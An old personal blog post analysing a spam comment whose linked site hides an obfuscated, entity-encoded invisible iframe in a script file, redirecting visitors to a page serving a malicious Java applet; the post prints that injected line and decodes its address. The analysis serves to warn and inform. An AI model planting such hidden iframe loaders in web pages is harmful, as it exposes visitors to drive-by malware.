Anatomy of a spam comment

by Volker Weber

anatomyofaspamcomment

[CAUTION: Do NOT load any of the URLs mentioned below]

Today I have received yet another spam comment that tried to install a link to a site which calls itself "A WebSite for creative intellectuals" and pretends to educate you on the usage of The Gimp. This has happened before: Twice on 29.09.2004 from IP address 141.30.207.43, which belongs to the data center of the Technical University Dresden, and again from the same address on 5.6.2006. On 10.11.2006 the spammer has moved to 131.188.3.20, which (as the address used above) belongs to the Friedrich Alexander University Erlangen-Nuernberg. The site which the spammer links to belongs to a person with an address in Dresden.

If you examine the source code of the site, you will find that it loads /data.htm, which in term loads /ad/s-block.js which contains an interesting line:

document.write('<iframe src="&#104&#116&#116&#112&#58&#47&#47&#120&#45 &#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99 &#104&#47&#111&#117&#116&#46&#112&#104&#112" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');

This translates to an iframe loaded from http://x-road.co.kr/rich/out.php. This PHP script evaluates the referrer and either takes you to Yahoo.com or loads a malicious Java applet. Here is what Google has to say about this address:

thissitemayharmyourcomputer

And if you ask Google who links to this trap, you will find sites like sixtus.net, Schockwellenreiter, Mein Parteibuch, etc.

2007-04-19 :: email :: bookmark :: digg

Comments

very interesting! thank you.

Samuel Adam, 2007-04-20 08:22

Vielleicht sollte man Google Adsense mal darauf aufmerksam machen, denn entweder handelt es sich um einen Adsense-Großkunden (zu erkennen am fehlenden Google-Logo bei der unten eingeblendeten Anzeige), oder die Jungs haben das Adsense Script verbotenerweise geändert. Soweit ich weiß, ist z.B. "google_hints" noch in der Testphase und nur für ausgewählte Kunden verfügbar.

Bei mir wird von der "/data.htm" übrigens nicht "/ad/s-block.js" aufgerufen, sondern "/ad/h-block.js".

Michael Preidel, 2007-04-20 09:49

Er lädt beide.

Volker Weber, 2007-04-20 10:39

Post a comment











Shall I remember this for you?




Use your full name and a working email address. Unless you want your comment to be removed. No kidding.



Ceci n'est pas un blog

vowe.net is a personal website published by Volker Weber a.k.a. vowe. I am an author, consultant and systems architect based in Darmstadt, Germany.

rss Click here to subscribe

Hello

About me
Contact
Publications
Certificates
Frequently asked questions

Twitter Updates

More >

Poll

Which BlackBerry could be your next one?

Getting poll results. Please wait...

Local time is 17:07

visitors.gif
195 visitors online

News

Other sources of news, imported into my own format to make them more accessible:

Heise Online
Schlagzeilen
Weather

Archives

As most of my articles roll off the front page rather quickly, I am making an archive of previous posts available here. You can also use the handy search box at the top of the page if you are looking for something particular.

Last 30 days
More archives

Got the T-shirt?

Got the T-shirt?
Are you buying from the US?

Systems Architecture

This site runs on an Apache web server on top of the Linux operating system. The content is managed with MovableType which is implemented in Perl. Last but not least the HTML code your browser sees is put together with PHP.

© 1992-2008 Volker Weber.
All Rights Reserved.

Impressum